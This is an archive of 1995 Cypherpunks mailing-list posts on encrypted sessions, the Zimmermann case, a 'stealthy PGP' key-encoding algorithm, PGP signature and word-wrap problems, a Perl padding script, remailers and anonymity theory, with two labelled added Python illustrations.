There is also the thing this guy Andy Heffernan did a draft on in
which you do this at the TCP layer; he uses a TCP option to pass IVs
and MACs.

There is also the method proposed by the AFT working group at the
IETF, a.k.a. the "socks" working group, for encrypting sockets.

There is also the thing that Miron Cuperman wrote for YTalk. It did
Diffie-Hellman key exchange followed by an encrypted session.

There are about three or four more that I can't bring to mind at the
moment but I'm damn sure I've seen them.

> I think it comes down to the fact that, of these, only Skronk and 
> Blaze's software use a Diffie-Hellman -like Key Exchange so that
> administration stuff doesn't have to be done by humans and footnet.

Diffie-Hellman doesn't give you real security without some sort of way
to authenticate the exchange. Man in the middle gets you. You are then
down to either using signed exchanges or some sort of challenge or
conventionally keyed way of authenticating.

BTW, Kerberos most emphatically does not require active
administration. I've run it in an environment with thousands of hosts
with nary a person paying it any attention.

> The real value I'm adding is not the crypto.  It's the packaging.
> When I'm done it should be possible to skronk all your current 
> clients and servers by just overriding the shared library libc.so,
> running a skronk map UDP daemon, and customizing a configuration
> file to tell the daemon what to say.

Well, this is an admirable goal. Of course, the Netscape people want
to do the same thing with SSL, and others have proposed to do it, too.

Ultimately, the thing that is going to fix the net is IP layer
encryption -- anything at a higher layer can't really fix all the
problems reliably. (As an example, consider RST attacks against TCP
connections.) It also can't fix them pleasantly.

Meanwhile, of course, it is going to be a while before that stuff is
universally deployed. My reference implementation isn't going to be
here before April. It will be freely available, but it will only run
on some architectures, and it is unlikely to be idiot friendly or
perfect out of the box day one.

Understand, also, that as one of the few people here who writes code I
don't want to discourage you from continuing by any means!

However, I'd say that this isn't going to be a permanently deployed
thing on the net -- that much we can be pretty sure of.

> The discussion question is -- if we have so many hacks already -- 
> how come they're not in use.

Probably people aren't that enthusiastic about them. Encrypted
sessions are in wide use for telnet and the like -- I do that sort of
thing regularly, and now that session stealing has become a fact of
the net I suspect that S/Key is going to vanish and be replaced by
various encrypted telnets. SMTP it doesn't make much sense to protect
because what you really want to protect is the contents -- i.e. via
PEM, MIME security multiparts, or some similar method (I favor PGP'ed
secure multiparts myself.)

> p.s.	need some wizard-level help here.
> 
> 	I use syscall(2) when I reimplement read() write() connect()
> 	accept() etc. on SunOS. 

Why? Why not just do the original calls? If you are trying to overlay
shared libraries, just rename the calls in the symbol tables or
relink the library or something similar...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sun, 5 Feb 95 21:06:23 PST
To: cypherpunks@toad.com
Subject: Zimmermann charges NOT dropped
In-Reply-To: <199502052059.MAA08492@netcom8.netcom.com>
Message-ID: <199502060504.VAA19605@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Charges against Phil Zimmermann have apparently NOT been dropped, and
Zimmermann's legal team is still in high gear.

Proving once more that things said or asked on this list often--even
usually--find their way to the persons mentioned, Phil called me today
to ask further about what I'd heard from Drew Taubman and to explain
that as of Friday, when Phil Dubois, Phil's lawyer, spoke to the
prosecutor in the case, the case had not been dropped. Or if it was,
the lead attorney and his client were not told.

(My discussion with Drew was at 10 p.m., Wednesday, Monte Carlo time.)

So, it appears that my source was either incorrect, or wires got
crossed in some way. (Or that EFF has access of a kind that seems
farfetched.)

Phil speculated that Drew was speaking about the LaMacchia case, of
several weeks back. This is unlikely, as the LaM. case was a separate
discussion we had, specific mention was made that the news was very
recent, happening within a few days of our conversation, and that
Senator Leahy would be incorporating changes based on the PRZ case
situation into legislation on telephony and expert being planned.

In any case, it seemingly is just not the case that charges have been
dropped (or that plans to file them have been dropped).

Anyway, my apologies. I sometimes think I am talking to the 20-30 of
you who post regularly, and can thus feel free to ask about a report
I've heard. But, as Hal Finney and others have also discovered, this
is not the case...boundaries are changing in cyberspace.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 5 Feb 95 21:35:07 PST
To: cypherpunks@toad.com
Subject: Re: Remailer encryption module
Message-ID: <199502060534.VAA26941@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: eric@remailer.net (Eric Hughes)
> -- The RSA-encrypted session key does not have a flat representation
> over its multiword container.  This yields a statistical traffic
> analysis hole.  (This point is irrelevant without fixing 4.)  Hal and
> I completely solved this problem last year.

For reference, here is that old message with an algorithm that produces an
encrypted session key with a flat distribution over a specified number of
bytes, along with a proof that it works.  The purpose of this is you
could strip off the PGP header stuff and have a file which looked for all
intents and purposes like totally random bytes, but if you knew the
secret key then you could decrypt it just fine.

(I recently took my CP archives and indexed them using Mark Zimmermann's
(no relation to Phil, apparently) FreeText browser which lets me do
keyword searches.  Pretty nice.)

> Date: Mon, 7 Mar 94 08:34:04 -0800
> From: hughes@ah.com (Eric Hughes)
> Message-Id: <9403071634.AA10351@ah.com>
> To: cypherpunks@toad.com
> In-Reply-To: Hal's message of Sun, 6 Mar 1994 11:22:17 -0800 <199403061922.LAA26901@jobe.shell.portal.com>
> Subject: Truly Stealthy PGP (algorithm)
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> Status: RO
> 
> >If I understand Eric's general idea, we would keep trying session keys
> >under a set of rules which would lead to the desired statistical
> >distribution of the encrypted key.  
>  
> I actually said nothing about how to get the particular distribution
> of keys specified, since that was another issue.  I was more concerned
> with just getting the one result across.
>  
> >Here is an algorithm which would work.
>  
> It does work, and I'll put down a proof sketch below.
>  
> Notation alert:
> >Let L be the next power of 256 above the modulus n.  Let t be the integer
> >part of L/n, so that L = n*t + s with s in [0,n).  Call the PGP IDEA session
> >key SK, and the encrypted version of that m = SK^e.  Now do these steps:
> 
> >1) Pick a random SK in [0,n).
> 
> This random number in [0,n) is the wrong distribution, but that's OK,
> since we'll be throwing some numbers away.
>  
> >2) RSA-encrypt it to form m = SK^e mod n.
>  
> RSA encryption is a bijection (a 1-1 map).  If it were not, there
> would be two or more possible decryptions for a given ciphertext.
> Therefore RSA encryption is a permutation, and a permutation of
> probabilities preserves expected values of functions of the
> probability, such as entropy.  Since we assume the entropy of the SK
> is maximal (probabilistic entropy), therefore the entropy of the m's
> is maximal.  So the m's have a flat distribution.
>  
> (As always, the above statements about bijection hold only if SK is
> multiple of one of the divisors of the modulus.  But then if you do
> find one of those, you've also factored the modulus and thus broken
> the key.  We assume this doesn't happen, since if it does little of
> this matters anyway.)
> 
> >3) Choose a random k in [0,t].
> >4) Calculate the "stegged" encrypted key as M = m + k*n.  
>  
> Hal now observes that M is uniformly distributed.  This is correct,
> and happens because m is in [0,n) and we are adding a multiple of n to
> m.  This means that each M has a unique representative as some pair
> <m,k>.  Since both m and k are independently random (max entropy, flat
> distribution), so is M.
> 
> >5) if M is not in [0,L) (i.e. if M >= L) then go back to step 1.
> >The idea is that once we get M uniform in [0,(t+1)*n) we can make it
> >uniform in [0,L) simply by rejecting those candidates which were too high.
>  
> What we have here is a Markov chain.  We have accepting states and
> rejecting/retrying states.  Since the probabilities in the chain are
> independent of each other and are also time-invariant, the
> distribution of final probabilities is the same as the distribution of
> normalized accepting probabilities.
> 
> In simple terms, you can just retry until you get it right.  Since the
> probabilities are all the same before, they will all be the same
> after, only larger to account for the fact that some possibilities
> didn't work.
>  
> [re: rejection and retry]
> >This will only happen if k=t and m>=s.
> 
> That's right, and that means that for m < s you have valid k in
> [0,t+1) and for m >= s only for [0,t).  If you go back and look at the
> entropy expression, you'll see exactly this difference in relative
> probability for the two parts of [0,n).
>  
> >Now, it seems to me that the worst case for rejection is when n=L-1, in
> >which case t=1, s=1, and almost one-half of all initial SK choices will
> >be rejected.  
> 
> Right, but the worst case for rejection is not the same as the worst
> case for entropy loss, which occurs at n=L/2+1 and s=t-1, i.e. at the
> other end of the spectrum entirely.
>  
> >Following Eric's reasoning, this would be an effective loss
> >of one bit of key length, from say 1024 to 1023, which is tolerable.
> 
> Actually not.  The loss of effective key length happens based on the
> posterior distribution of the session keys, not on the number of
> rejections that happen in the process.
>  
> >Using this algorithm with the current Stealth PGP would produce a
> >"truly stealthy" version which I think would be indistinguishable from
> >random bytes without access to the receiver's private key.
> 
> Indeed.  Observe, though, that as far as deployment went, this would
> require modification to PGP itself for it to be anything like
> widespread.
>  
> Eric
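
Steps 1-5 of the algorithm quoted above, as an added Python example that is not part of the original thread. It assumes a constructed toy key (n = 3233 = 61 * 53, e = 17, d = 2753) and textbook RSA without padding; all function names are hypothetical. Exhaustive enumeration shows that every M in [0,L) comes from exactly one accepted <SK,k> pair, and that an SK keeps t+1 choices of k when m < s but only t when m >= s.

```python
"""Rejection-sampling wrap for an RSA-encrypted session key (toy parameters)."""
import secrets
from collections import Counter

# Constructed toy key (assumption, far too small for real use): n = 61 * 53.
N, E, D = 3233, 17, 2753


def stealth_params(n):
    """L = next power of 256 above n; L = n*t + s with 0 <= s < n."""
    L = 256
    while L <= n:
        L *= 256
    t, s = divmod(L, n)
    return L, t, s


def stealth_wrap(n, e, randbelow=secrets.randbelow):
    """Run steps 1-5 until a candidate is accepted. Returns (SK, M, attempts)."""
    L, t, _ = stealth_params(n)
    attempts = 0
    while True:
        attempts += 1
        sk = randbelow(n)        # 1) random SK in [0, n)
        m = pow(sk, e, n)        # 2) m = SK^e mod n
        k = randbelow(t + 1)     # 3) random k in [0, t]
        M = m + k * n            # 4) "stegged" encrypted key
        if M < L:                # 5) M >= L is rejected; start over
            return sk, M, attempts


def stealth_unwrap(M, n, d):
    """Receiver side: reduce mod n to drop the k*n offset, then RSA-decrypt."""
    return pow(M % n, d, n)


def enumerate_outputs(n, e):
    """Visit every (SK, k) pair once and count how often each accepted M occurs."""
    L, t, _ = stealth_params(n)
    hits = Counter()
    for sk in range(n):
        m = pow(sk, e, n)
        for k in range(t + 1):
            M = m + k * n
            if M < L:
                hits[M] += 1
    return hits


def accepted_k_per_sk(n, e):
    """For each SK, count the choices of k in [0, t] that survive step 5."""
    L, t, _ = stealth_params(n)
    counts = {}
    for sk in range(n):
        m = pow(sk, e, n)
        counts[sk] = sum(1 for k in range(t + 1) if m + k * n < L)
    return counts


if __name__ == "__main__":
    L, t, s = stealth_params(N)
    hits = enumerate_outputs(N, E)
    print("L, t, s =", L, t, s)
    print("distinct M values:", len(hits), "of", L)
    print("multiplicities seen:", sorted(set(hits.values())))
    per_sk = Counter(accepted_k_per_sk(N, E).values())
    print("SKs by number of accepted k:", dict(per_sk))
    sk, M, attempts = stealth_wrap(N, E)
    print("SK", sk, "-> M", M, "in", attempts, "attempt(s);",
          "receiver recovers", stealth_unwrap(M, N, D))
```

The unequal per-SK counts are the posterior skew in the session-key distribution that the reply separates from the raw rejection rate.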




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Sun, 5 Feb 95 19:02:57 PST
To: cypherpunks@toad.com
Subject: Re: signature validation on secure edit messages
Message-ID: <v01510104ab5b3e946aac@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Good point.  But if you turn word wrap off, your message will go out as one long line, or one long line for each paragraph.  Most smart mail programs will handle this cleanly, but I assume there are still many that won't.  Have all the people who are using PGP with Eudora been sending mail without line breaks?  Is this not a problem for 99.99% of the mail-reading software out there?

   --Dave.


At 5:28 PM 2/5/95, Joel McNamara wrote:
>Try turning Word Wrap off in Eudora.  I was encountering the same thing in the Windows version of Eudora.  With Word Wrap on, it seems to add CRs (or CR/LFs on a PC) to the end of each line upon sending.  This obviously causes a message not to match the signature, since all of those CRs weren't there when you composed it.  With Word Wrap off, your text still wraps on the screen when you're composing, but those unwanted CRs in the sent mail don't get added.
>
>Joel McNamara
>joelm@eskimo.com - finger for PGP key
>    
>>Jeez. I really don't know why the heck this always happens to me, my
>>digsigs not validating.
>>
>>You can finger me at tjbryce@amherst.edu to retrieve a message with a valid
>>signature.
>>
>>I always write the message in eudora, copy it, sign it in MacPGP as TEXT
>>with attached signature, then go back and paste it over the old message.
>>Then I go back to MacPGP and check the signature on the clipboard to be
>>sure - no problems. But after getting mailed, it doesn't work.
>>
>>Damn.
>>
>>Tom
>>

-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----

--
Dave Mandl
dmandl@panix.com
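
The failure discussed in this message, as an added Python example that is not part of the original thread. It assumes a simplified canonical text form (every CR, LF or CRLF line ending becomes CRLF) and uses SHA-256 as a stand-in for the digest a signature would cover; the sample text and all function names are constructed. It shows that a line-ending change survives canonicalization while breaks inserted by a wrapping mailer do not, and gives a check that tells the two apart when a signature fails.

```python
"""Why hard-wrapping on send breaks a text signature (simplified model)."""
import hashlib
import textwrap

# Constructed sample: one long paragraph line as the composer stores it
# with word wrap off, followed by a short sign-off.
SIGNED = (
    "With word wrap on, the composer shows this paragraph folded on screen "
    "but stores it as one long line until the message is sent.\n"
    "\n"
    "Tom\n"
)


def canonical(text):
    """Simplified text-mode canonical form: any line ending becomes CRLF."""
    return "\r\n".join(text.splitlines())


def digest(text):
    """Digest of the canonical text (SHA-256 as a stand-in, an assumption)."""
    return hashlib.sha256(canonical(text).encode("utf-8")).hexdigest()


def hard_wrap(text, width=76):
    """Model a mailer that inserts real line breaks into long lines on send."""
    out = []
    for line in text.split("\n"):
        out.extend(textwrap.wrap(line, width) or [""])
    return "\n".join(out)


def diagnose(signed, received):
    """Classify how the received text differs from what was signed."""
    if signed == received:
        return "identical"
    if canonical(signed) == canonical(received):
        return "line endings only"      # absorbed by canonicalization
    if signed.split() == received.split():
        return "re-wrapped"             # same words, different line breaks
    return "content changed"


if __name__ == "__main__":
    variants = {
        "CRLF transport": SIGNED.replace("\n", "\r\n"),
        "hard-wrapped at 76": hard_wrap(SIGNED),
        "edited": SIGNED.replace("Tom", "Tim"),
    }
    for name, received in variants.items():
        ok = digest(received) == digest(SIGNED)
        print(f"{name:20s} digest match: {ok!s:5s} -> {diagnose(SIGNED, received)}")
```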






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 5 Feb 95 22:04:34 PST
To: cypherpunks@toad.com
Subject: Re:  finney's perl scripts
Message-ID: <199502060603.WAA00621@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: anonymous-remailer@shell.portal.com
> hal , gotta question regarding your perl scripts .
>  i ran em thru sh and d/l'd em , and here are the
> results of my tests . first , i pgp'd a file in
>  binary format , then ran " perl pgppadt.pl
> test.pgp 10 " . the error i got was " Couldn't
>  create test.pgp.pad " . so i renamed the file to
> " test " and tried again with good results ! i got
>  " Input file test has size 732 bytes 10 bytes 
> pgppad returns code -3 " . then , i ran " perl 
>  pgppad.pl test 10 " and after the bit about perl
> running under dos/4gw protected mode , i get dropped
>  to my command prompt . i took a look at the file ,
> and it's size wasn't any different , so i renamed the
>  file to test.pgp and ran it again and got the same
> results . so i guess i'm wonderin' if it added the
>  padding , or what might be the problem ? for your
> info , i'm using perl 4.0.

Unfortunately, my PC's disk died several months ago so I don't have one
right now.

pgppadt.pl sets the output file name with:
open (OUT, ">$ARGV[0].pad") || die ("Couldn't create $ARGV[0].pad\n");

This doesn't work on DOS since it appends .pad to the input file name so
it doesn't fit the 8.3 character format.

The other errors you are getting are probably due to the difference
between binary and ascii I/O mode on DOS.  I forgot about that
in my test script.  Try this revision of pgppadt.pl, and let me know if
it works on DOS:

----------------------cut here------------------------------
# Test program for pgppad.pl, showing how to use it.
# Revised 2/5/95 for DOS legality
# Usage: perl pgppadt.pl infile <bytes-to-add>
# Output file is infile, stripped of extensions, with .pad appended.

require 'pgppad.pl';
 
open (IN, $ARGV[0]) || die ("Couldn't open $ARGV[0]\n");
$outfile = $ARGV[0];
$outfile =~ s/\..*//;
open (OUT, ">$outfile.pad") || die ("Couldn't create $outfile.pad\n");
binmode IN;
binmode OUT;

$padding = $ARGV[1];
 
@stat = stat(IN);
$size = $stat[7];
print "Input file $ARGV[0] has size $size bytes\n";
print "Output file $outfile.pad will have size ",$size+$padding," bytes\n";
 
if (($code = &pgppad (IN, OUT, $size+$padding)) < 0) {
    die ("pgppad returns code $code\n");
}
 
close (IN);
close (OUT);
print ("Done\n");
----------------------cut here------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Sun, 5 Feb 95 20:30:56 PST
To: cypherpunks@toad.com
Subject: dna ink
Message-ID: <Pine.3.89.9502052222.B22385-0100000@Joyce-Perkins.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



I just saw an item on CNN about a company in LA called Art Guard.  It 
sells an ink that is created using your dna as a protection against 
forged signatures.

Interesting.

Dan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 5 Feb 95 22:58:47 PST
To: anonymous-remailer@shell.portal.com
Subject: Re: Judge not...
In-Reply-To: <199502060147.RAA25515@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9502052211.A8714-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


> [...]
> 
> Notification of 
> authorities external to the Net should be avoided. Contacts 
> to the Press should be left to those who have been trained in 
> public relations or have equivalent experience.

Seems thoroughly sane.
 
> How does the Judges' List work?
> 
> The List distributes messages to a panel of Judges who cancel 
> multiple posts to NetNews immediately. The List is used to 
> help Judges organize themselves, finalize policy, and set 
> procedures to enforce rules. It is primarily directed to 
> those who issue cancels.

In other words, it is a list for net vigilantes.

Sounds reasonable to me.  We need net vigilantes and we need
them to talk to each other.

Why should anyone object to this?

Enforcers are self appointed:  How else should anarchy work?
 

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 5 Feb 95 23:01:37 PST
To: cypherpunks@toad.com
Subject: re finney's perl scripts
Message-ID: <199502060700.XAA06256@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


hal sez ,

: The other errors you are getting are probably due to the difference
: between binary and ascii I/O mode on DOS.  I forgot about that
: in my test script.  Try this revision of pgppadt.pl, and let me know if
: it works on DOS:

works like a charm , thanks !




















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Sun, 5 Feb 95 21:07:50 PST
To: Johnathan Corgan <jcorgan@aeinet.com>
Subject: Re: Here we go again...
In-Reply-To: <Chameleon.4.01.950205084831.jcorgan@comet.aeinet.com>
Message-ID: <Pine.SV4.3.91.950205230508.28613A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 5 Feb 1995, Johnathan Corgan wrote:

>                   ***** SPECIAL ALERT *****
>  - Congress to consider making all system operators liable
>    for messaging content.  Bill would force employers to
>    monitor message content.              ACTION NEEDED NOW!
> <---------------------------------------------------------->

Anyone got the text of this bill? Good old thomas.log.gov wasn't too much 
help. It seemed to only list proposed changes to the bill.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Sun, 5 Feb 95 23:44:10 PST
To: cypherpunks@toad.com
Subject: Creating commercial acceptability for remailers?
Message-ID: <9502060742.AA01282@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


How can we convince _lots_ of people to run remailers,
assuming it can be made technically painless?
How can we spread remailer-operations beyond the cypherpunks and
fellow travellers and the privacy/paranoia businesses like
tax reduction and pharmaceutical retailers?

Suppose you were in the "Get Connected To The Net" consulting business,
and you wanted to include a remailer in the outside-the-firewall
part of the mail handler - how would you get companies to accept it?

What kinds of other businesses could benefit from providing anonymous service?

Some ideas for non-mundane businesses -
- Shrinks-r-us or other on-line recovery groups, beyond the current
	use in a.s.a.r.?
- Tax advice - one-shot anonymous returns so you can ask questions
	from the IRS or whatever without much risk of audit?
- Anonymous tips (the D.A.R.E. hotline?)  Arrrgh.	
- Whistleblowers.com?  (Who'd trust whistleblowers.gov?)
- For one-way anonymity, perhaps MTV could run an "email from Beavis" server,
	letting you send rude comments to your friends.
	Digitally signed, with optional MIME noises!
	Sending mail through it might put your address in an
	email junk-mail marketing list, but without tying it
	to the outgoing message?
	
But what about mundane businesses?  I've seen suggestion boxes
operated with minimalist anonymization for internal use
(no attempt to obscure the time or prevent logging, just header-zapping.)
University ombudsman's offices could be a good approach,
and might help get around the occasional reactive sysadmins.
But that's inside the firewall, though I suppose you could
use them for outgoing mail as well. 

Another use for inside-to-outside remailers is to preserve the privacy of
internal addresses, though that's more likely to need a service which 
replaces the originating headers with the real user's name, using some 
authentication to prevent forged email from the company president, etc.

Any suggestions on getting companies to accept outside-to-outside-capable
remailers on their gateways, or outside-to-inside?


		Anonymity is cool, heh,heh..
			Beavis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 6 Feb 95 00:00:52 PST
To: MIKEINGLE@delphi.com (Mike Ingle)
Subject: Re: New directions in anonymity (needed)
In-Reply-To: <01HMPLWWZOXU90B2L7@delphi.com>
Message-ID: <199502060743.XAA01417@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike Ingle wrote:
> 
> There has been a lot of talk about anonymity and the best ways of providing
> it recently. Anonymity now is about where cryptography was before Diffie and
> Hellman's paper, or untraceable transactions before Chaum. To use it, you
> have to trust someone, or at least a group of people.
> 
> All of our anonymous systems boil down to only two techniques: indirection
> and broadcast. Indirection is sending a message through one or more
> intermediate nodes to conceal its point of origin. Broadcast is sending a
> message to multiple recipients to conceal the intended recipient.

First, I think it important to clearly distinguish between "sender
anonymity," where the physical identity or sending site is hidden, and
"receiver anonymity," where the same is true of the receiving site.

Chaumian digital mixes--what you Americans call "remailers"--mainly
solve the sender anonymity problem. Message pools, or broadcast to a
group or site that includes the receiver, mainly deals with receiver
anonymity. The combination of the two deals with both.

Both are solved elegantly with the Dining Cryptographer's Protocol,
about which much is written on this list every few months. Messages
are "sent" in an Ouija-board fashion and received by the person who
can successfully decrypt a public message sent over the system.

The process can be made information-theoretically secure, with
one-time pads used instead of ciphers. But, as Mike Ingle points out
here, the process can be compromised if _enough collusion_ exists. Ah,
but so can all known systems!

Digital money is not untraceable if you're the only person in the
universe (or in _your_ universe...same difference) who is using it, or
if the banks, shops, and other customers are in collusion, leaving you
as the one and only user. (Proof: The banks and shops are not actually
using digital cash, leaving the "mark"--pun intended--as the only
person merrily spending digital cash. Ergo, all purchases made with
digital cash are traceable to this mark. I can imagine contrived
situations in the early days of digital cash when this kind of set-up
occurs.) 

My intuition is that any cryptographic situation in which an
individual/entity can be "isolated" so that all other individuals and
entities, and all connections, can be compromised (added to the set of
colluders) will be "broken." How else could it be?

Anyway, I think DC Nets are every bit as secure as e-cash is.
Obviously the security depends on a bunch of things, but the concept
of anonymous communication is not weaker in any fundamental way than
is digital cash. Full collusion by everyone who is not "you" causes
big problems with any cryptographic system that I know of.

(Stuff about reply blocks elided. I agree that more work is needed to
understand attacks on reply block methods. However, I'm not at all
convinced that "tracking back" is any different from the conventional
approach of demanding input-output mappings at each level, by
subpoenaing the remailer's records, etc. But I'll think about this
some more and maybe comment at another time.)

> Broadcast is exactly as secure as it is nonscalable. If you broadcast to 100
> people, an attacker's uncertainty is one in 100. The security grows linearly
> with the overall bandwidth. For cryptographic-level security, it would need
> to grow exponentially with bandwidth.

This gets to the important point of _proving_ vs. _suspecting_. To
make this concrete, consider that 10,000 people may download the
entire contents of, say, "alt.anonymous," a message pool newsgroup
created largely for the publication of anonymous messages.

The Internetpol may _suspect_ that one of these 10,000 readers is the
person to whom the message is intended, but cannot _prove_ it. Even
if the list of readers is down around 100, I know of no legal systems
that would accept this as proof. (There are many issues here, and many
more detailed scenarios. For example, over the course of time, as
readership changes but some readers remain readers, patterns may
emerge from the noise. And there are issues of bandwidth. I am not too
worried about running out of bandwidth soon, since an awful lot of text
messages can fit into just a single one of the MPEG or JPEG images
that flood the *.pictures newsgroups...and these *.pictures
newsgroups are sent to and locally stored on tens of thousands of
machines....) 

> Anonymity needs something fundamentally new, something comparable to public
> key for cryptography or blind signatures for digital cash. Suppose a server

I think you ought to carefully look at Chaum's work on Dining
Cryptographers. It does all this. (It ain't perfect, and it ain't been
implemented in practical terms, a la a "Pretty Good Dining
Cryptographers," but it's at least as basic a concept as the other
things are....some might say that all are variations on the same theme.)

> has a large file. A message comes in and is combined into this file. Another
> message comes in with a key to retrieve data. The server processes the
> retrieval key against this large file and comes up with an output, which it
> returns to the person doing the retrieving. This output contains the input
> message, transformed in such a way that even the server cannot match it
> to the input that produced it. This is what we need.

But how is this any less "suspicious" in terms of pointing to the
receiver than is the more general and easier process of simply
retrieving the file from the server? Why would doing some sort of
computation on the distant server make the act of access any less
incriminating? If 100 people all retrieve the file, they're the
"suspects," despite nothing being provable. And if those 100 people
first tell the server to do some particular transformation, they're
still equally suspect. (Unless they tell the server to use a chain of
remailers to do the retransmission to them, which is different from my
understanding here, and is in fact the "anonymous anonymous ftp" we've
long talked of.) And if fewer than the 100 people actually send the
message, then of course the list of suspects is even smaller. (The
advantages of passive, do-nothing broadcast are lost, a net lose.)

> It would require three keys: an encryption key, a selection key, and a
> decryption key. The sender uses the recipient's encryption key to encrypt
[stuff elided]

Be careful also not to assume the server is trustable, as I gather it
is presumed to be here. (Doing the transformations, and all.)

> A method like this would permit anonymity without trust, much as public key
> allows secrecy without trust and digicash allows transaction privacy without
> trust. Is there any way to do it? There are functions like the Fourier
> transform that can distribute data over a large file, but the inverse
> function gives you back the same data. We need the not-so-inverse function
> to give back a different piece of data, but one that can be converted, by a
> private key, into the original, which the server never sees.

I expect broadcast models, or anonymous anonymous ftp models, to be
more sophisticated than simple "publish everything in alt.anonymous"
strategies. That is, multiple routes, multiple places, hierarchies,
etc. All involve trade-offs in time, space, security, cost,
convenience.

Some methods may involve splitting files into multiple pieces for
independent retrieval. However, I am not really convinced that the
alleged problems are solved this way.

The point about "which the server never sees" is confusing to me.
Surely the server _could_ see the transformed data if he wanted to, as
he was the one who did the remote transformation (as I understand
Mike's scheme). (If the scheme involves a server which can do
transformations but not see the output, then this is a much harder
problem, dealing with models of computation, secure hardware, etc.)

(The idea of a sealed box which executes a model in which no records
are kept, etc., is of course Chaum's original 1981 concept of a
digital mix. No "key" need be sent by the recipient if in fact the box
executes the proper mix function, keeps no records, is not
compromised, etc. If Mike is suggesting that his "server" behave more
like a true digital mix and thus not be as dependent on human
trust, then of course this is a good idea. We need more mix-like
boxes, for our remailings. This has nothing to do with the broadcast
model per se, dealing as it does with the general mix issue.)

In any case, what difference does it make if the server sees the data
or file? He surely can track his internal CPU processes and know which
incoming file was sent out, and to which address! (Just the remailer
in-out mapping problem again, which has always been unconcerned with
the internal contents of files.)

Sorry for the length here.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay



















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 5 Feb 95 23:50:18 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Zimmermann charges NOT dropped
Message-ID: <v01510107ab5b7ff342ba@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:04 PM 2/5/95, Timothy C. May wrote:

>Anyway, my apologies. I sometimes think I am talking to the 20-30 of
>you who post regularly, and can thus feel free to ask about a report
>I've heard. But, as Hal Finney and others have also discovered, this
>is not the case...boundaries are changing in cyberspace.

Very true. I tend to forget that this list isn't just composed of the few
co-conspirators I sometimes tend to believe to know so well from their
postings.

 How was Monte Carlo? I used to live in Nice for some years and made it to
Monte Carlo once in a while. <Hmm, haven't been in Europe for years, London
is really nice in April. All the lawns are covered in daffodils. Got to get
some tickets tomorrow.>


-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Sun, 5 Feb 95 23:53:08 PST
To: cypherpunks@toad.com
Subject: Mixmaster supports PGP
Message-ID: <ab5b846d020210042dbd@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just wanted to officially announce the Mixmaster supports pgp encrypted
messages. I also want to plug using it as a second generation remailer
(that is why I wrote it). If you use a sun (that means you netcom folks),
get the front end from my home page.

Raph, please change the "mix" entry in your list to reflect pgp support.

Here is the Key:

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
